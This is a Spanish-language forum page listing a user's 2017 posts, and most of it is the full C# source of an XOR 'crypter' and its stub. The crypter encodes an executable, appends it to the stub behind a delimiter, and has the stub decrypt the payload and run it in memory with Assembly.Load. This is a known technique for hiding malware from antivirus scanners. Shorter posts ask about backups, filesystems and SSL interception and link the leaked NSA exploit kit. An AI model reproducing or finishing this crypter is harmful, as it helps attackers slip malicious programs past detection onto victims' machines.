últimos mensajes de: Borito30

Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 [10] 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 ... 53

Programación / .NET (C#, VB.NET, ASP) / Re: Ayuda con este crypter en .net

en: 10 Mayo 2017, 21:35 pm

Cita de: TickTack en 9 Mayo 2017, 14:35 pm

Hola Ragaza,

me puedes pasar el proyecto completo por favor?

Gracias y saludos!

Hola no me fije que posteastes en el post.
El código del stub es:

Código:

using System;
using System.Collections.Generic;
using System.Data;
using System.Text;
using System.Windows.Forms;
using System.IO;
using System.Runtime.InteropServices;
using System.Resources;
using System.Security.Cryptography;
using System.Reflection;
using Microsoft.Win32;

namespace skip
{
    static class Program
    {
        /// <summary>
        /// MAIN
        /// </summary>
        [STAThread]
        static void Main()
        {
        	string appDataPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
            Application.EnableVisualStyles();
            Application.SetCompatibleTextRenderingDefault(false);
            //Application.Run(new Form1());

			//leemos el byte array
			byte[] file = File.ReadAllBytes(System.Reflection.Assembly.GetExecutingAssembly().Location);

			//obtenemos la string
			string str = System.Text.Encoding.ASCII.GetString(file);
			string[] arr=str.Split(new string[] { "BLAUMOLAMUCHO" }, StringSplitOptions.None);
			string a = arr[0];
			string b = arr[1];
			
			/*Console.WriteLine(a);
			Console.WriteLine("------------------------------");
			Console.WriteLine(b);
			Console.ReadKey();*/
			
				
			byte[] encodedBytes = Encoding.ASCII.GetBytes(a);
			Stream stream = new MemoryStream(encodedBytes);
            FileStream fileStream = new FileStream(@"tola.exe", FileMode.Create, FileAccess.Write);
            for (int i = 0; i < stream.Length; i++)
                fileStream.WriteByte((byte)stream.ReadByte());
            //RunInternal(encodedBytes,"1234");
            
			

            
         }
        
        private static void RunInternal(byte[] exeName, String pass)
        {
            //Read the raw bytes of the file
            byte[] resourcesBuffer = exeName;

            //Decrypt bytes from payload
            byte[] decryptedBuffer = null;
            decryptedBuffer = decryptBytes(resourcesBuffer, pass);

         

            //If .NET executable -> Run
            if (System.Text.Encoding.ASCII.GetString(decryptedBuffer).Contains("</assembly>")) //Esto devuelve false
            {
                //Load the bytes as an assembly
                Assembly exeAssembly = Assembly.Load(decryptedBuffer);

                //Execute the assembly
                object[] parameters = new object[1];                //Don't know why but fixes TargetParameterCountException
				            
                try{
                	exeAssembly.EntryPoint.Invoke(null, parameters);
                }catch (Exception ex){
                	Console.WriteLine(ex);
                	Console.ReadKey();
                }
            }
            else
            {
                Console.WriteLine(Encoding.ASCII.GetString(decryptedBuffer));
                Console.ReadKey();
            }
  
        }

        /// <summary>
        /// Decrypt the Loaded Assembly Bytes
        /// </summary>
        /// <param name="payload"></param>
        /// <returns>Decrypted Bytes</returns>
        private static byte[] decryptBytes(byte[] bytes, String pass)
        {
            byte[] XorBytes = Encoding.Unicode.GetBytes(pass);

            for (int i = 0; i < bytes.Length; i++)
            {
                bytes[i] ^= XorBytes[i % XorBytes.Length];
            }

            return bytes;
        }
    }
}

Y el crypter es:

Código:

using System;
using System.Text;
using System.IO;
using System.Collections.Generic;
namespace Crypter
{
    class Program
    {
        [STAThread]
        static void Main(string[] args)
        {
            //No Arguments -> Exit
            if (args.Length < 2)
            {
                Console.WriteLine("Syntax: crypter.exe <Exe/Dll to get Encrypted> <Password> (Optional: output file name)");
                Environment.Exit(0);
            }

            String file = args[0];
            String pass = args[1];
            String outFile = "Crypted.exe";

            //If Output Name is specified -> Set it
            if (args.Length == 3)
            {
                outFile = args[2];
            }

            //File doesn't exist -> Exit
            if (!File.Exists(file))
            {
                Console.WriteLine("[!] The selected File doesn't exist!");
                Environment.Exit(0);
            }

            //Everything seems fine -> Reading bytes
            Console.WriteLine("[*] Reading Data...");
            byte[] plainBytes = File.ReadAllBytes(file);

            //Yep, got bytes -> Encoding
            Console.WriteLine("[*] Encoding Data...");
            byte[] encodedBytes = encodeBytes(plainBytes, pass);

            Console.WriteLine("[*] Save to Output File... ");
			
			//Leer el stub
			Console.WriteLine("[*] Reading Stub...");
			byte[] Stub = File.ReadAllBytes("Stub.exe");
			
			//byte separador
			string strseperate = "BLAUMOLAMUCHO";
		    byte[] toBytes = Encoding.ASCII.GetBytes(strseperate);
		    //byte[] toBytes = new byte[30];
		    
			//write bytes
			//var stream
            //Stream stream = Assembly.GetExecutingAssembly().GetManifestResourceStream("skip.skip.exe");
            //Console.WriteLine(stream);
            var s = new MemoryStream();
			s.Write(Stub, 0, Stub.Length);
			s.Write(toBytes, 0, toBytes.Length);
			s.Write(encodedBytes, 0, encodedBytes.Length);
			var b3 = s.ToArray();
			Stream stream = new MemoryStream(b3);
			
			
            //Stream stream = new MemoryStream(encodedBytes);
            FileStream fileStream = new FileStream(@"out.exe", FileMode.Create, FileAccess.Write);
            for (int i = 0; i < stream.Length; i++)
                fileStream.WriteByte((byte)stream.ReadByte());
			
            Console.WriteLine("Done!");

            Console.WriteLine("\n[*] File successfully encoded!");
        }
        private static byte[] encodeBytes(byte[] bytes, String pass)
        {
            byte[] XorBytes = Encoding.Unicode.GetBytes(pass);

            for (int i = 0; i < bytes.Length; i++)
            {
                bytes[i] ^= XorBytes[i % XorBytes.Length];
            }

            return bytes;
        }
    }
}

El problema es que estaba haciendo con un delimitador pero si conviertes un byte array a cadena en mi caso lo muestra y lo escribes un .exe puede corromperse.

92	Programación / ASM / Re: Codigo en lenguaje de ensamblador MIPS	en: 10 Mayo 2017, 16:47 pm
donde esta el error que has intentado? así podria resolverlo.

Programación / .NET (C#, VB.NET, ASP) / Ayuda con este crypter en .net

en: 9 Mayo 2017, 13:41 pm

Va estaba intentando cambiar un crypter para que lo haga directamente del stub el problema es el sigiente.
no sé como podría juntar dos byte arrays con un delimitador y que cuando arranque mi programa sea capaz de obtenerlos por medio de un split.
el código es el siguiente.

Código:

//Everything seems fine -> Reading bytes
Console.WriteLine("[*] Reading Data...");
byte[] plainBytes = File.ReadAllBytes(file);

//Yep, got bytes -> Encoding
Console.WriteLine("[*] Encoding Data...");
byte[] encodedBytes = encodeBytes(plainBytes, pass);

Console.WriteLine("[*] Save to Output File... ");

//Leer el fichero
Console.WriteLine("[*] Reading fichero...");
byte[] Stub = File.ReadAllBytes("rutafichero");

// ::: Create new List of bytes
var list = new List<byte>();
list.AddRange(encodedBytes);
list.AddRange(Stub);

// ::: Call ToArray to convert List to array
byte[] resultado = list.ToArray();

//write bytes
File.WriteAllBytes(outFile, resultado);

//File.WriteAllBytes(outFile, encodedBytes);
Console.WriteLine("Done!");

Console.WriteLine("\n[*] File successfully encoded!");

Entonces juntare ambos pero luego los separaré por medio del stub. Saludos y gracias.

94	Foros Generales / Dudas Generales / Copia de seguridad de todo mi sistema/particion windows	en: 5 Mayo 2017, 15:33 pm
Como dice el proverbio es mejor prevenir que curar. Entonces había pensado en instalar algun programa para hacer una copia de seguridad de toda mi partición (principalmente lo hago para conservar ficheros,directorios que no querría que se me borrasen) o es mejor hacer una copia directamente del directorio de la partición. Saludos y gracias!

95	Foros Generales / Dudas Generales / Re: Sistema de ficheros ext4 una maravilla en comparación con ntfs?	en: 5 Mayo 2017, 02:07 am
Pues a lo mejor pienso seá problema de mi disco duro pienso porque es extraño que tardé tanto en mi windows.

96	Foros Generales / Dudas Generales / Sistema de ficheros ext4 una maravilla en comparación con ntfs?	en: 5 Mayo 2017, 01:17 am
Bueno esto es una duda, inquietud y también una experiencia. Normalmente estoy acostumbrado a usar windows por facilidad, comodidad, aunque en realidad en un linux tambien puedes arrancar binarios de windows usando wine. Pero esque ultimamente cuando muevo una carpeta entre otras muchas cosas tarda horas o meses(esto era sarcasmo) mientras que cuando reinicio y uso linux veo que tarda 1 segundo mi pregunta que hago me paso a linux de cajón ya que mi cerebro esta acostumbrado a windows o cada vez que quiero mover ficheros uso linux a ver que me aconsejan.

97	Foros Generales / Foro Libre / Alguien tiene algunos programas que hizo doddy?	en: 29 Abril 2017, 01:42 am
Hola estoy buscando algunos programas en concreto que publico doddy solo algunos concreto y ya no están.

98	Seguridad Informática / Bugs y Exploits / Re: NSA leak exploits shadow brokers---- AYUDA WINDOS 8 AND WINDOWS SERVER 2012	en: 24 Abril 2017, 17:58 pm
te refieres a NSA's arsenal de Windows a este leak te refieres? o algun otro exploit publica por la NSA? Mi pregunta es donde has descargados los exploit's o todas las herramientas las han hecho publicas y accesibles a los internautas? Tal vez te refieras a esto? https://github.com/x0rz/EQGRP https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1

99	Seguridad Informática / Hacking / Re: la proteccion SSL es segura?¿	en: 24 Abril 2017, 00:27 am
Leyendo este artículo http://www.zdnet.com/article/how-the-nsa-and-your-boss-can-intercept-and-break-ssl/ me dio que pensar. lo que si sé esque en juegos populares que utilizando certificados SSL han sido vulnerados obteniendo las rsa-key y un proxy que hace mitm entre tu navegador- y la pagina obteniendo la información en texto plano o mismamente usando un certificado falso que sea aceptado por la pagina web.

100	Seguridad Informática / Hacking / la proteccion SSL es segura?¿	en: 23 Abril 2017, 23:41 pm
Veo muchas paginas que utilizan este tipo de protección y ya a nivel de seguridad es bastante utilizada y me corrio esa duda. ¿Es una buena manera de proteger la información en una pagina web que no queramos revelar?

Páginas: 1 2 3 4 5 6 7 8 9 [10] 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 ... 53